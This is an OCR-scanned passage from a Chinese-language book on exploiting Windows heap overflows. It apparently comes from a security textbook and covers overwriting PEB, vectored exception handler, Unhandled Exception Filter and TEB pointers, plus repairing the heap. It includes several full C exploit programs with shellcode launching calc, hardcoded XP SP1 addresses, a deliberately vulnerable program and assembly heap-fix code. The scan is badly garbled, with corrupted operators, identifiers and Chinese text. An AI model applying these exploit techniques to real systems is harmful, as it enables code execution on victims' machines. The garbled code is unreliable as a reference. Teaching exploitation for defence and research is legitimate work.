我 们 分 析 过 PEB， 也 介绍 了 它 的 结构 。 在 这 里 重 提 PEB 是 要 大 家 记 住 一 些 要 点 。 特 别 是 指向 
RtlEnterCriticalSection() 和 RtlLeaveCriticalSection() 的 一 对 函数 指针 。 你 可 能 会 奇 
怪 ，ntq11.911 输 出 的 RtlAccquirePebLock() 和 RtlReleasePebLock() 函数 将 引用 这 两 个 指 
针 。 从 ExitProcess() 的 执行 路 径 可 以 调用 这 两 个 函数 。 同 样 ， 可 以 利用 PEB 来 运行 代码 ， 特 别 
是 在 进程 退出 时 。 异常 处 理 程 序 经 常 调用 ExitProcess， 因此 ， 如 果 存 在 这 样 的 异常 处 理 程序 ， 
就 会 调用 它 。 堆 溢出 时 可 以 改写 任意 双 字 ， 因 此 ， 我 们 可 以 修改 PEB 里 的 某 个 指针 。 但 是 是 什么 
使 这 个 方法 具有 如 此 大 的 吸引 力 呢 ? 因为 不 管 是 哪个 版 本 的 Windows NTx, 不 管 是 SP 还 是 补丁 级 
别 ，PEB 的 位 置 都 是 固定 的 ， 所 以 ， 这 些 指针 的 位 置 也 是 固定 的 。 








注解 Windows 2003 不 用 这 些 指 针 ， 详 情 参 看 本 节 结尾 的 讨论 。 


寻找 指向 RtlEntercriticalSection() 的 指针 可 能 是 最 好 的 选择 ， 因 为 这 个 指针 通常 在 
0x7FFDF020 处 。 然 而 ， 在 破解 堆 溢出 时 ， 使 用 的 地 址 是 0x7FFDF01c， 因 为 我 们 要 用 EAX+4 引 
用 它 。 

77F62571 89 48 04 mov adword ptr [eax-4],ecx 

这 里 不 需要 什么 技巧 ， 只 需 溢出 缓冲 区 ， 改 写 数据 ， 引 起 访问 违例 ， 然 后 开始 执行 Exit- 
Process， 就 万 事 大 吉 了 。 尽 管 如 此 ， 还 是 要 记 住 ， 首先 ， 你 的 代码 主要 是 再 把 这 个 指针 设 为 以 
前 的 值 ， 因 为 其 他 的 地 方 可 能 还 会 用 到 这 个 指针 ， 因 此 ， 你 将 丢掉 这 个 进程 ， 其次， 你 可 能 还 需 
要 修复 堆 ， 这 要 取决 于 代码 做 了 些 什 么 。 

当然 ， 在 进程 退出 时 ， 只 有 当代 码 仍 在 堆 附 近 ， 修 复 堆 才 有 用 。 顺 便 提 一 下 ， 你 的 代码 可 
能 会 被 丢掉 ， 特 别 是 当 异 常 处 理 程序 调用 ExitProcess () 时 会 发 生 这 种 情形 。 你 可 能 也 发 现 了 
另 一 个 有 用 的 技术 一 利用 访问 违例 来 执行 代码 , 这 在 处 理 可 执行 的 基于 Web 的 CGI 扒 溢 出 时 非 
常 有 用 。 

下 面 的 代码 演示 了 怎样 利用 访问 违例 执行 恶意 活动 。 它 能 破解 前 面 提 到 的 代码 。 

#include <stdio.h> 
#include «windows.h» 
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unsigned int GetAddress(char *lib, char *func); 
void fixupaddresses(char *tmp, unsigned int x); 


int main() 

{ 
unsigned char buffer[300]=""; 
unsigned char heap[8]=""; 
unsigned char pebf[8]=""; 
unsigned char shellcode[200]-""; 
unsigned int address of system - 0; 
unsigned int address of RtlEnterCriticalSection - 0; 
unsigned char tmp[8]=""; 
unsigned int cnt - 0; 


printf("Getting addresses...\n"); 

address of system - GetAddress("msvcrt.dll","system"); 

address of RtlEnterCriticalSection - 
GetAddress("ntdll.dll","RtlEnterCriticalSection"); 

if(address of system -- E! 
address of RtlEnterCriticalSection -- 0) 

return printf("Failed to get addresses\n"); 

printf ("Address of msvert.system\t\t\t= 
$.8XWAn",address of system); ` 

printf ("Address of ntdll.RtlEnterCriticalSection\t= 
%.8X\n",address_of RtlEnterCriticalSection); 
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// Pointer to heap and thus shellcode 
strcat (buffer, "\x88\x06\x35"); 


strcat (buffer, "\""); 
printf("\nExecuting heapl.exe... calc should open.\n"); 
system(buffer); 

return 0; 


unsigned int GetAddress(char *lib, char *func) 
{ 
HMODULE 1=NULL; 
unsigned int x=0; 
l = LoadLibrary (lib); 
if(!1) 
return 0; 
X = GetProcAddress(l,func); 
if(!x) 
return 0; 
return x; 


void fixupaddresses(char *tmp, unsigned int x) 
{ 
unsigned int a = 0; 
a = x; 
a =a << 24; 
a = a >> 24; 
tmp[0]-a; 
a= x 
a = a >> 8; 
a = a << 24; 
a = a >> 24; 
tmp[1]=a; 
a= x; 
a= a >> 16; 
a= a << 24; 
a = a >> 24; 
tmp[2]=a; 
a =x; 
a = a >> 24; 
tmp[3]-a; 
) 


顺便 说 一 下 ，Windows 2003 Server 没 有 使 用 这 些 指针 。 事 实 上 ，Windows 2003 Server 把 PEB 
里 的 这 些 地 址 设 为 NULL 了。 也 就 是 说 ， 仍 可 以 进行 类 似 的 攻击 。 对 Exitprocess() 或 
UnhandledExceptionFilter () 的 调用 会 调用 许多 Lar* 函 数 , 诸如 LarunloagD11 () 。 许 多 Larx 
函数 将 调用 一 个 不 为 零 的 函数 指针 。 当 SHITM 引 擎 出 现时 ， 通 常会 设置 这 些 函数 指针 。 对 正常 的 进 
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程 来 说 ， 并 没有 设置 这 些 指针 。 通 过 滋 出 设置 这 些 指针 ， 可 以 达到 同样 的 效果 。 
Overwrite Pointer to First Vectored Handler at 77FC3210 


在 Windows XP 里 曾 介绍 过 Vectored 异常 处 理 。 它 不 像 传统 的 帧 异常 处 理 那 样 在 栈 上 保存 异 
常 注册 结构 ，Vectored 异 常 处 理 在 堆 上 保存 处 理 程序 的 数据 。 保 存 这 些 数据 的 结构 和 实际 的 异常 
注册 结构 很 类 似 。 
struct _VECTORED EXCEPTION NODE 
{ 
adword m_pNextNode; 
adword m_pPreviousNode; 
PVOID m pfnVectoredHandler; 
) 
m_pNextNode 指 向 下 一 个 _VECTORED_EXCEPTION_NODE 结 构 , m_pPreviousNode 指 向 前 一 个 
_VECTORED_BXCEPTION_NODE 结 构 ，m_pfnVectored 指 向 实现 处 理 程序 的 代码 地 址 。 如 果 发 生 异 
常 ， 在 0x77FC3210 可 以 发 现 将 被 使 用 的 、 指 向 第 一 个 Vectored 异 常 节点 的 指针 《过 段 时 间 ，SP 
可 能 会 修改 这 个 地 址 )。 当 破解 堆 溢出 时 , 我 们 可 以 用 指向 自己 的 伪 _VECTORED_EXCEPTION_NODE 
结构 的 指针 改写 这 个 指针 。 这 个 技术 的 优点 是 ，Vectored 异 常 处 理 程序 在 所 有 帧 处理 程序 之 前 被 
调用 。 
如 果 发 生 异 常 ， 下 面 的 代码 (在 Winddows XP SPLE) 负责 调度 处 理 程序 ; 


77F7F49E mov esi,dword ptr ds:[77FC3210h] 
77F7F4A4 jmp 77F7F4B4 

TIFTF4A6 lea eax, [ebp-8] 

TIFTF4A9 push eax 

7T7F7FAAA call dword ptr [esi+8] 

77F7FAAD cmp eax, OFFh 

77F7F4B0 je 77F7FACC 

TIETFAB2 mov esi,dword ptr [esi] 

TIF7FABA cmp esi,edi 

77F7F4B6 jne 77F7FA4A6 


这 段 代码 把 指向 第 一 个 要 调用 的 Vectored 处 理 程序 的 _VECTORED_EXCEPTION_NODE 结 构 的 指 
针 移 到 EsT， 然 后 调用 EsT+8 指 向 的 函数 。 在 破解 堆 溢出 时 ， 通 过 把 0x77Fc3210 处 的 指针 设 为 指 
向 我 们 自己 ， 就 能 获得 进程 的 控制 权 。 

那 应 该 怎么 做 呢 ? 首先 , 在 内 存 中 寻找 指向 已 分 配 堆 块 的 指针 。 如 果 保 存 这 个 指针 的 变量 是 
局 部 变量 ， 那 么 它 应 该 在 当前 的 栈 帧 中 。 即 使 它 是 全 局 变量 ， 仍 可 能 在 栈 的 某 个 地 方 ， 因 为 它 是 
作为 函数 的 参数 被 压 入 栈 的 ; 如果 这 个 函数 是 HeapFree()， 那 可 能 性 会 更 大 。( 指 向 这 个 块 的 指 
针 作 为 第 三 个 参数 被 压 入 栈 。) 一旦 找到 它 的 地 址 《比方 说 0x0012FF50)， 那 就 可 以 认为 这 是 我 
们 的 m_pfnvectoredHandler 使 0x0012FF48 成 为 假冒 的 _VECTORED_EXCEPTION_NODE 结 构 的 地 
址 。 因 此 ， 当 溢出 堆 管 理 数据 时 ， 可 以 把 0x0012FF48 作 为 一 个 指针 ， 把 0x77Fc320C 作 为 男 一 个 
指针 提交 。 当 以 下 代码 执行 时 ; 
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77F6256F 89 01 mov dword ptr [ecx],eax 
77F62571 89 48 04 mov dword ptr [eax-4],ecx 


0x77FC320C (EAX) 被 移 到 0x0012FF48 (ECX), 0x0012FF48 (ECX) 被 移 到 0x77FC3210 (EAX+4)。 
结果 ,保存 在 0x77Fc3210 的 、 指 向 顶层 的 _vECTORED_EXCEPTION_NODE 结 构 的 指针 妇 我 们 所 有 。 
这 样 的 话 ， 当 异常 产生 时 ，0x0012FF48 被 移 到 ESI 寄存 器 (在 0x77F7F49FE 处 的 指令 )， 稍 后 ， 调 
用 EsI+8 指 向 的 函数 。 这 个 函数 的 地 址 位 于 我 们 在 堆 上 分 配 的 缓冲 区 ， 因 此 ， 它 被 调用 时 ， 将 执 
行 我 们 的 代码 。 详 情 看 下 面 的 例子 : 


#include <stdio.h> 
#include <windows.h> 


unsigned int GetAddress(char *lib, char *func); 


void fixupaddresses(char *tmp, unsigned int x); 


int main() 

{ 
unsigned char buffer[300]=""; 
unsigned char heap[8]=""; 
unsigned char pebf[8]=""; 
unsigned char shellcode[200]=""; 
unsigned int address_of_system = 0; 
unsigned char tmp[8]=""; 
unsigned int cnt = 0; 


printf ("Getting address of system...\n"); 
address of system = GetAddress("msvcrt.dll","system"); 
if(address of system -- O0) 


return printf("Failed to get address.\n"); 


printf ("Address of msvcrt.systemWMtNtNt-9&.8XWMn",address of system); 


strcpy(buffer,"heapl "); 

while(cnt « 5) 

{ 
strcat (buffer, "\x90\x90\x90\x90"); 
cnt ++; 

// Shellcode to call system("calc"); 


strcat (buffer, "\x90\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9" ) ; 


fixupaddresses(tmp,address of system); 
strcat (buffer, tmp); 
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strcat (buffer, "\xFF\xD1");; 


cnt = 0; 
while(cnt < 58) 


{ 
strcat (buffer, "DDDD"); 


cnt ++; 


// Pointer to 0x77FC3210 - 4. 0x77FC3210 holds 
// the pointer to the first —VECTORED EXCEPTION NODE structure. 


strcat (buffer, "\x0C\x32\xFC\x77"); 


// Pointer to our pseudo -—VECTORED EXCEPTION NODE 


// structure at address Ox0012FF48. This address + 8 
// contains a pointer to our allocated buffer. This 
// is what will be called when the vectored exception 
// handling kicks in. Modify this according to where 
// it can be found on your system 

strcat (buffer, "\x48\xff£\x12\x00"); 


printf ("\nExecuting heapl.exe... calc should open. An"); 
System(buffer); 
return 0; 





unsigned int GetAddress(char *lib, char *func) 
{ 

HMODULE l-NULL; 

unsigned int x-0; 

1 = LoadLibrary (lib); 


if(!1) 
return 0; 
x = GetProcAddress(1,func); 
if(!x) 
return 0; 
return x; 


void fixupaddresses (char *tmp, unsigned int x) 


{ 
unsigned int a = 0; 


a= x; 
a —- a << 24; 
a = a >> 24; 
tmp[0]-a; 

a = x; 


a = a >> 8; 
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a - a << 24; 
a = a >> 24; 
tmp[1]=a; 
a = x; 
a = a >> 16; 
a= a << 24; 
a = a >> 24; 
tmp[2]=a; 
a = x; 
a= a >> 24; 
tmp[3]-a; 

) 


8.7.2 ”改写 指向 未 处 理 异 常 过 滤器 的 指针 

Halvar Flake 在 2001 年 阿姆斯特丹 举行 的 Blackhat Security Briefings 会 议 上 首次 提 到 了 使 
用 未 处 理 异 常 过 滤器 (Unhandled Exception Filter)。 当 异常 发 生 后 没有 处 理 程 序 可 调度 时 ， 
或 者 没有 指定 的 处 理 程序 时 ， 未 处 理 异常 过 滤器 将 被 作为 最 后 的 处 理 程序 执行 。 程 序 可 能 会 
利用 setUnhandledExceptionFilter() 函 数 设置 这 个 处 理 程序 .下 面 是 这 个 函数 的 部 分 代 
码 : 


77E7E5A1 mov ecx,dword ptr [esp+4] 
77E7E5A5 mov eax, [77ED73B4] 

77E7E5AA mov dword ptr ds: [77ED73B4h],ecx’ 
77E7E5BO ret 4 


可 见 ， 指 向 未 处 理 异 常 过 滤器 的 指针 保存 在 0x77ED73B4， 至 少 在 Windows XP SP1 上 是 这 样 
的 。 其 他 的 系统 可 能 是 这 个 地 址 ， 也 可 能 是 其 他 地 址 。 反 汇编 目标 系统 上 的 SetUunhandled- 
ExceptionFilter () 函数 可 以 找到 它 确切 的 值 。 

当 一 个 未 经 处 理 的 异常 发 生 时 ， 系 统 执行 下 列 代码 : 


77E93114 mov eax, [77ED73B4] 
77593119 cmp eax,esi 
77E9311B je 77E93132 
77E9311D push edi 

77E9311E call eax 


未 处 理 异 常 过 滤器 的 地 址 被 移 到 EAX， 然 后 调用 EAX。 在 调用 之 前 ，push edi 把 指向 
栈 上 EXCEPTION_POINTERS 结 构 的 指针 压 入 栈 。 请 用 心 记 住 这 一 点 ， 我 们 在 后 面 还 会 用 到 
Eo 

当 堆 溢出 时 ， 如 果 异 常 没 有 被 处 理 ， 我 们 就 能 破解 未 人 处理 异常 过 滤器 机 制 。 为 了 做 到 这 
些 ， 需 要 设置 自己 的 未 处 理 异 常 过 滤器 。 如 果 可 以 预先 知道 它 的 地 址 ， 可 以 直接 把 它 设 为 指 
向 缓冲 区 地 址 ; 或 者 把 它 设 为 指向 一 个 包含 一 段 代码 或 一 条 指令 的 地 址 ， 以 便 返 回 缓冲 区 。 
WE: 在 调用 这 个 过 滤器 之 前 ，EDI 被 压 入 栈 。 这 是 指向 EXCEPTION_ POINTER 结 构 的 指针 。 
指针 之 后 的 0ox78 字 节 恰 好 是 一 个 在 缓冲 区 内 的 地 址 ; 而 实际 上 ， 那 是 一 个 位 于 堆 管 理 数据 之 
前 指向 缓冲 区 结尾 的 指针 。 然 而 ， 它 并 不 是 EXCEPTION_POINTER 结 构 的 一 部 分 ， 可 以 试 着 
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用 EDI 返 回 我 们 的 代码 。 我 们 所 要 找 的 是 一 个 在 进程 里 执行 下 列 指令 的 地 址 ; 

call dword ptr[edi+0x78] 


这 昕 起 来 有 点 离谱 ， 但 实际 上 在 好 几 个 地 方 都 可 以 找到 这 条 指令 ， 这 取决 于 地 址 空间 加 
载 了 哪些 DLL， 当 然 ， 这 也 取决 于 你 使 用 什么 操作 系统 或 补丁 版 本 。 这 里 以 Windwos XP SPI 
为 例 。 


call dword ptr[edi+0x74] found at 0x71c3de66 [netapi32.d11] 
call dword ptr[edi+0x74] found at 0x77ca3bbad [netapi32.d11] 
call dword ptr[edi+0x74] found at 0x77c41e15 [netapi32.d11l] 
call dword ptr[edi+0x74] found at 0x77d92a34 [user32.d11] 
call dword ptr[edi+0x74] found at 0x7805136d [rpcrt4.d11] 
call dword ptr[edi+0x74] found at 0x78051456 [rpcert4.dl1] 


— 











注解 Windows 2000_L, ESI+0x4C 和 EBP+0x74 都 包含 了 指向 缓冲 区 的 指针 。 











如 果 把 未 处 理 异常 过 滤器 设 为 指向 上 面 所 列 的 某 个 地 址 ， 那 么 ， 倘若 未 经 处 理 的 异常 发 生 ， 
这 条 指令 将 被 执行 ， 使 我 们 巧妙 地 回 到 缓冲 区 。 顺 便 说 一 下 ， 仅 当 这 个 进程 不 在 调试 状态 时 ， 才 
会 调用 未 处 理 异 常 过 滤器 。 下 面 的 补充 内 容 讲 了 修复 这 个 问题 的 方法 。 






在 调试 时 调用 未 处 理 异 常 过 滤器 

当 一 个 异常 被 抛 出 时 , 它 会 被 系统 捕获 . 执行 流程 立即 切换 到 ntdl11.d11 中 的 KiUserExcep- 
tionDispatcher () 。 当 异常 发 生 时 , 这 个 函数 负责 处 理 . 在 Windows XP. E, KiUserException- 
Dispatcher() 最 早 调用 的 是 Vectored 处 理 程序 ， 然 后 是 帧 处 理 程序 ,最 后 才 是 未 处 理 异常 过 滤 
器 。 在 Windows 2000 上 ， 除 了 没有 Vetored 异 常 处 理 外 ， 其 他 的 都 一 样 。 在 破解 堆 溢 出 过 程 中 ， 
如 有 果 有 漏洞 的 进程 处 于 调试 状态 ， 你 可 能 会 遇 到 一 个 问题 ， 因 为 在 那 时 ， 未 处 理 异常 过 滤器 不 
会 被 调用 。 当 编写 使 用 未 处 理 异 常 过 滤器 的 破解 时 ， 会 觉得 这 很 令 人 讨厌 ， 然 而 ， 这 个 问题 可 
以 解决 。 

KiUserExceptionDispatcher () 44 M UnhandledExceptionFilter() 元 数 以 
确认 进程 是 否 处 于 调试 状态 ， 是 否 真 应 该 调用 未 处 理 异常 过 滤器 。 而 UnhandledExcep- 
tionFilter () BAZ A NT/ZwQueryInformationProcessA 4 HA, 如 果 进 程 处 于 调试 状 
态 ， 这 个 函数 将 把 栈 上 的 变量 设 为 0xFEEFEEEFEF 。NT/ZwQueryInformationProcess 返 回 后 ， 
UnhandledExceptionFilter() 肖 数 将 把 这 个 变量 和 一 个 被 清 零 的 寄存 器 做 比较 ， 如 果 匹 配 ， 调 
用 未 处 理 异 常 过 滤器 ， 如 果 不 匹配 ， 不 调用 未 处 理 异 常 过 滤器 。 所 以 ， 如 果 你 想 在 调试 进程 
的 过 程 中 仍 能 调用 未 处 理 异 常 过 滤器 ， 那 么 应 该 在 做 比较 的 地 方 设置 断 点 ， 当 和 触发 断 点 时 ， 
把 0xFFEEFEFF 改 为 0x00000000， 然 后 继续 执行 进程 。 这 样 ， 未 处 理 异常 过 滤器 将 会 被 调 
A. 

下 图 描绘 了 Windows XP SP1 平 台 上 未 处 理 异常 过 滤器 的 相关 代码 。 假 若 这 样 ， 你 可 以 在 
0x77E9310B 处 设置 断 点 ， 等 待 异常 发 生 ， 函 数 被 调用 。 一 旦 触发 断 点 ， 我 们 就 可 以 把 [EBP_20h] 设 
为 0x00000000， 此 后 ， 未 处 理 异 常 过 滤器 将 能 被 正常 调用 。 
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77E930F5 lea eax, [ebp-20h] 
77E930F8 push eax 
77E930F9 push 7 

77E930FB call | 77E7E6B9 


77E7E6B9 or eax, OFFh 
77E7E6BC ret 
如 果 [EBP+20h] 等 于 0x00000000 
77E93100 push eax (ESI 的 当前 值 ) 那么 调用 
77E93101 call dword ds : [77E610ACh : 

T pe ! Unhandled Exception Filter 


77F76035 mov eax, 9Ah 
77F7603A mov edx, 7FFE0300h 
77F7603F call edx 


7FFEO300 mov edx, esp 转 到 内 核 模 式 


7FFE0302 sysenter 
7FFE0304 ret 


77F76041 ret 14h 


77E93107 test eax, eax 
77£93109 ji 77E93114 
Mole cmp estan ptr [ebp-20hl esi 
| 77E9310E jne 7E937D9 : 
77193114. mov ‘eax, [77ED73B4] | 如 果 ESI 不 等 于 [EBP- 
| 77693119 cmp eax, esi 20h], BESIOx77E937D9 
77E9311B je 77E93132 : 
77E9311D push edi 
77E9311E call eax 
‘77693709 | eax, fs : [00000018] - 
7E93; eax, dword ptr an 
. . byte ptr [eax«69h]1 
| 27093510 —— 


: "Windows xP UKUSUATQUUUA QUITE 


A n— n 样 利用 未 处 理 异 常 过 滤器 , 需要 把 异常 处 理 程序 从 脆弱 的 程序 中 
移出 。 因 为 如 果 异 常 被 异常 处 理 程序 处 理 了 ， 就 轮 不 到 未 处 理 异常 过 滤器 了 。 


#include <stdio.h> 
#include «windows.h» 








int foo(char *buf); 


int main(int argc, char *argv[]) 
{ 
HMODULE 1; 
1 = LoadLibrary ("msvert.dll"); 
l = LoadLibrary ("netapi32.dli"); 
printf ("\n\nHeapoverflow program. An"); 
if(arge != 2) 
return printf("ARGS!"); 
foo(argv[11); 
return 0; 


int foo(char *buf) 
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t 
HLOCAL h1 = 0, h2 = 0; 
HANDLE hp; 
hp = HeapCreate(0,0x1000,0x10000); 
if(!hp) 
return printf("Failed to create heap. Mn"); 
hl = HeapAlloc(hp,HEAP ZERO MEMORY,260); 
printf("HEAP: $.8X %.8X\n",h1,&h1); 
// Heap Overflow occurs here: 
strcpy(hl,buf); 
// We gain control of this second call to HeapAlloc 
h2 - HeapAlloc(hp,HEAP ZERO MEMORY,260); 
printf ("hello"); 
return 0; 
} 


下 面 的 代码 是 针对 这 个 脆弱 程序 的 攻击 代码 。 用 一 对 指针 改写 堆 管 理 结构 ， 一 个 (指针 ) d8 
向 0x77ED73B4 的 未 处 理 异 常 过 滤器 ， 另 一 个 指向 0x77c3BBAD netapi32.dll 里 内 容 为 call 
dword ptr[edi+0x78] 指 令 的 地 址 。 在 第 二 次 调用 Heapalloc () 时 ， 设 置 过 滤器 并 等 待 异 常 。 
因为 异常 未 被 异常 处 理 程序 处 理 ， 所 以 未 处 理 异 常 过 滤器 被 调用 ， 我 们 能 运行 代码 。 注 意 ， 我 们 
的 代码 放 在 缓冲 区 中 的 短 跳 转 处 〈EDI+0x78 指 向 的 地 方 )， 因 此 需要 跳 过 堆 管 理 数据 。 


#include <stdio.h> 
#include <windows.h> 


unsigned int GetAddress(char *lib, char *func); 
void fixupaddresses(char *tmp, unsigned int x); 


int main() 

{ 
unsigned char buffer[(1000]=""; 
unsigned char heap[8]=""; 
unsigned char pebf[8]=""; 
unsigned char shellcode[200]-""; 
unsigned int address of system - 0; 
unsigned char tmp[8]-""; 
unsigned int a - 0; 
int cnt = 0; 


printf ("Getting address of system...\n"); 
address of system = GetAddress("msvcrt.dll","system"); 
if(address of system -- O0) 

return printf("Failed to get address. Mn"); 
printf("Address of msvcrt.system\t\t\t= $.8XMn",address of system); 
strcpy (buffer, "heapl "); 
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while(cnt « 66) 

{ 
streat (buffer, DDDD"); 
ent++; 


// This is where EDI+0x74 points to so we need to do a short jmp forwards 
strcat (buffer, "\xEB\x14"); 


// some padding 
strcat (buffer, "\x44\x44\x44\x44\x44\x44"); 


// This address (0x77C3BBAD : netapi32.dll XP SP1) contains 
// a "call dword ptr[edi+0x74]" instruction. We overwrite 
// the Unhandled Exception Filter with this address. 


strcat (buffer, "\xad\xbb\xc3\x77"); 


// Pointer to the Unhandled Exception Filter 
strcat (buffer, "\xB4\x73\xED\x77"); // 77ED73B4 


ent = 0; 


while(cnt < 21) 
{ 
strcat (buffer, "\x90"); 
cnt ++; 
} 
// Shellcode stuff to call system("calc*); 


strcat (buffer, "\x33\xCO\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"); 
fixupaddresses(tmp,address of system); 
streat (buffer,tmp); 
strcat (buffer, "\xFF\xD1\x90\x90"); 
printf ("\nExecuting heapl.exe... calc should open.\n"); 
system(buffer) ; 
return 0; 


unsigned int GetAddress(char *lib, char *func) 
{ 

HMODULE 1=NULL; 

unsigned int x=0; 

l = LoadLibrary (lib); 


if(!1) 

return 0; 
x = GetProcAddress(1l,func); 
if(!x) 


return 0; 
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return x; 


void fixupaddresses(char *tmp, unsigned int x) 
{ unsigned int a = 0; 

a= x; 

a - a << 24; 

a = a >> 24; 


tmp[0]=a; 
a= x; 

a = a >> 8; 
à = a << 24; 
a = a >> 24; 
tmp[1]=a; 
a= x; 

a = a >> 16; 
a - a << 24; 
a = a >> 24; 
tmp[2]=a; 
a= x; 

a = a >> 24; 
tmp[3]=a; 


} 
Overwrite Pointer to Exception Handler in Thread Environment Block 


作为 利用 未 处 理 异 常 过 滤器 的 方法 之 一 ，Halvar Flake 第 一 个 提出 改写 指向 TEB 里 的 异常 注 
册 结 构 的 指针 。 我 们 知道 ， 每 个 线程 都 有 TEB， 可 以 通过 Fs 段 寄存 器 访问 它 。Fs: [0] 包含 指 向 
第 一 个 帧 异常 注册 结构 的 指针 。TEB 变 量 的 具体 位 置 取决 于 有 和 多少 线程 、 什 么 时 间 创 建 的 等 因 
素 。 第 一 个 线程 的 TEB 地 址 通常 是 0x7FFDE000， 第 二 个 线程 的 TEB 地 址 是 0x7FFDD000， 两 者 
相隔 0x1000 个 字 节 , 依 此 类 推 。 TEB 向 0x00000000 方 向 增长 。 下列 代码 显示 第 一 个 线程 的 TEB 
地 址 : 


#include <stdio.h> 


int main() 
{ 
. asm( 
mov eax, dword ptr fs:[0x18] 
push eax 
J 
printf("TEB: %.8X\n"); 


. .asm( 
add esp,4 
J 


return 0; 
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如 果 线程 退出 ， 空 间 被 释放 ， 接 下 来 创建 的 线程 将 得 到 这 个 空闲 块 。 EUROS Pe HE 
溢出 问题 CTEB 的 地 址 为 0x7FFDE000)， 那 么 指向 第 一 个 异常 注册 结构 的 指针 将 保存 在 
0x7FFDE000。 在 堆 溢 出 中 ， 我 们 可 以 用 指向 伪 注 册 结 构 的 指针 改写 这 个 指针 ， 那 么 当 访 问 违 例 
发 生 后 , 异常 被 抛 出 , 我 们 就 控制 了 将 被 执行 的 处 理 程序 的 数据 。 然 而 ， 当 碰 到 多 线程 服务 器 时 ， 
破解 会 稍微 难 一 些 ， 这 是 因为 我 们 不 能 完全 确认 当前 线程 的 TEB 在 什么 地 方 。 也 就 是 说 ， 这 个 方 
法 适用 于 单线 程 程序 (如 可 执行 的 CGI-based)。 如 果 你 是 在 多 线程 服务 器 上 使 用 这 个 方法 ， 那 么 
最 好 是 派生 多 个 线程 ， 然 后 从 中 选用 较 低 的 TEB 地 址 。 


87.3 修复 堆 

一 旦 堆 在 溢出 时 被 破坏 了 ， 很 可 能 要 修复 它 。 因 为 如 果 不 这 样 做 ， 我 们 的 进程 有 99.9% 的 
可 能 会 引起 访问 违例 ， 如 果 被 破坏 的 是 默认 进程 堆 ， 那 么 可 能 性 会 更 大 。 当 然 ， 可 以 逆向 分 
析 目 标 程 序 ， 精 确 计算 出 缓冲 区 的 大 小 和 下 一 个 分 配 块 的 大 小 ， 等 等 。 我 们 可 以 还 原 这 个 值 ， 
但 如 果 针 对 每 个 脆弱 的 程序 都 这 样 做 ， 将 会 耗费 大 量 的 精力 。 一 般 的 修复 堆 的 方法 可 能 会 更 
好 一 些 ， 最 可 人 靠 的 方法 是 把 这 个 扒 做 一 番 修 饰 ， 使 它 看 起 来 像 一 个 新 堆 ， 可 以 说 ， 非 常 像 。 
记 住 ， 当 一 个 堆 在 任何 分 配 发 生前 已 经 被 创建 时 ， 我 们 在 FreeLists[0] CHEAP BASE + 
0x178) 有 两 个 指针 指向 第 一 个 空闲 块 (在 HEAP_BASE + 0x688 处 可 以 找到 )， 第 一 个 空闲 
块 有 两 个 指针 指向 FreeLists[0]。 我 们 可 以 修改 FreeLists[0] 的 指针 ， 让 它 指向 块 结尾 ， 
使 它 作 为 第 一 个 空闲 块 出 现在 缓冲 区 之 后 。 我 们 也 要 设置 缓冲 区 结尾 处 的 指针 ， 让 它 指 回 
FreeLists[0] 和 一 对 其 他 的 东西 。 假设 破坏 了 默认 进程 堆 上 的 堆 块 , 那么 可 以 用 下 面 的 汇 
编 代 码 修复 它 。 在 做 其 他 事 之 前 先 运行 这 段 代 码 可 以 预防 访问 违例 ， 同 时 ， 它 也 是 清除 那 
些 被 滥用 的 处 理 机 制 的 好 习惯 ， 这 样 的 话 ， 如 果 访 问 违 例 发 生 ， 你 就 不 必 不 断 地 进行 循环 
处 理 了 。 1 


// We've just landed in our buffer after a 

// call to dword ptr[edi+74]. This, therefore 
// is a pointer to the heap control structure 
// so move this into edx as we'll need to 

// set some values here 

mov edx, dword ptr[edi+74] 

// If running on Windows 2000 use this 

// instead 

// mov edx, dword ptr[esi-0x4C] 

// Push 0x18 onto the stack 

push 0x18 

// and pop into EBX 

pop ebx 

// Get a pointer to the Thread Information 

// Block at fs:[18] 

mov eax, dword ptr fs:[ebx] 

// Get a pointer to the Process Environment 
// Block from the TEB. 

mov eax, dword ptr[eaxt*0x30] 
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// Get a pointer to the default process heap 
// from the PEB 

mov eax, dword ptr[eax+0x18] 

// We now have in eax a pointer to the heap 
// This address will be of the form 0x00nn0000 
// Adjust the pointer to the heap to point to the 
// TotalFreeSize dword of the heap structure 
add al1,0x28 

// move the WORD in TotalFreeSize into si 
mov Si, word ptr[eax] 

// and then write this to our heap control 
// structure. We need this. 

mov word ptr[edx],si 

// Adjust edx by 2 

inc edx 

inc edx 

// Set the previous size to 8 

mov byte ptr[edx] , 0x08 

inc edx 

// Set the next 2 bytes to 0 

mov si, word ptr [edx] 

xor word ptr[edx],si 

inc edx 

inc edx 

// Set the flags to 0x14 

mov byte ptr[edx] , 0x14 

ine edx 

// and the next 2 bytes to 0 

mov si, word ptr[edx] 

xor word ptr[edx],si 

inc edx 

inc edx 

// now adjust eax to point to heap base-0x178 
// It's already heap base-0x28 

add ax,0x150 

// eax now points to FreeLists[0] 

// now write edx into FreeLists[0].Flink 
mov dword ptr[eax],edx 

// and write edx into FreeLists[0].Blink 
mov dword ptr[eax*4],edx 

// Finally set the pointers at the end of our 
// block to point to FreeLists[0] 

mov dword ptr[edx],eax 

mov dword ptr[edx-4],eax 


修复 堆 之 后 ， 应 该 准备 运行 代码 了 。 顺 便 说 一 下 ， 因 为 其 他 的 线程 可 能 在 堆 的 某 个 地 方 存 有 
数据 ， 所 以 我 们 不 能 把 堆 设 为 全 新 的 。 例 如 ， 调 用 wsastartup 后 ，winsock 的 数据 将 保存 在 堆 上 。 
如 果 把 堆 恢复 到 默认 状态 ， 这 些 数据 就 会 被 毁坏 ， 任 何 调 用 winsock 函 数 的 动作 都 将 引起 访问 志 
例 。 
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8.7.4” 堆 溢出 的 其 他 问题 

不 是 所 有 的 堆 溢出 都 是 通过 Heapalloc () 和 HeapFree () 调用 被 破解 的 。 堆 洲 出 的 其 他 问题 
包括 但 不 限于 C++ 类 的 私有 数据 和 组 件 对 象 模 型 (COM) 对 象 。COM 人 允许 程序 员 创建 一 个 由 其 
他 程序 创建 的 对 象 。 对 象 有 函数 或 方法 ， 能 被 调用 以 完成 某 些 任务 。 关 于 COM 有 一 个 很 好 的 信 
息 来 源 ， 那 就 是 微软 公司 的 网 站 (www.microsoft.com/com/)。COM 有 哪些 趣事 ? 它 与 堆 溢出 有 
何 关 联 呢 ? 

1. COM 对 象 和 堆 

